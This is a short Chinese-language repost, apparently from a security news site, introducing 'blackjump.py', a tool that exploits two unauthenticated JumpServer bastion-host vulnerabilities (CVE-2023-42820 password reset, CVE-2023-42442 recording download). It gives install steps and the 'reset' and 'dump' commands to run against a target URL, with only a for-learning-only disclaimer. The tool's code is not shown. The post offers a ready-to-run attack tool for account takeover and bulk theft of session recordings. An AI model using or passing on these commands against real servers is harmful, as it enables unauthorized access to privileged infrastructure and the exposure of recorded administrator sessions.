JumpServer 堡垒机未授权综合漏洞利用

华盟原创文章投稿奖励计划

介绍

JumpServer 堡垒机综合漏洞利用

  •  未授权任意用户密码重置 (CVE-2023-42820)

  •  未授权一键下载所有操作录像 (CVE-2023-42442)

安装

python3 -m pip install -r requirements.txt

使用

  • CVE-2023-42820: 如果知道目标的用户名和邮箱可以指定 --user 和 --email 参数

python3 blackjump.py reset https://vulerability

自动草稿

  • CVE-2023-42442: output/ 目录下的 <uuid4>.tar 文件扔进 jumpserver播放器播放即可

python3 blackjump.py dump https://vulerability

自动草稿

  • 帮助

python3 blackjump.py {reset,dump} -h

文章来源:HACK之道

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

本文来源HACK之道,经授权后由华盟君发布,观点不代表华盟网的立场,转载请联系原作者。

发表回复